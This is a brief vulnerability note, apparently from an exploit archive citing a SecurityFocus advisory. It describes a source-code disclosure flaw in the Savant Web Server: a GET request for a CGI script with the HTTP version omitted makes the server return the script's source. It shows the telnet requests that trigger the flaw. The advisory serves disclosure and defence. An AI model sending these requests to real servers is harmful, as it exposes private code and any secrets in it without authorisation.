13 lines
332 B
Text
Executable file
13 lines
332 B
Text
Executable file
source: http://www.securityfocus.com/bid/1313/info
|
|
|
|
Omitting the HTTP version from a "GET" request for a CGI script to the Savant Web Server discloses the source code of the script.
|
|
|
|
telnet target 80
|
|
|
|
GET /cgi-bin/script.xyz HTTP/1.0
|
|
<proper script execution/output>
|
|
|
|
GET /cgi-bin/script.xyz
|
|
<source code displayed>
|
|
|
|
|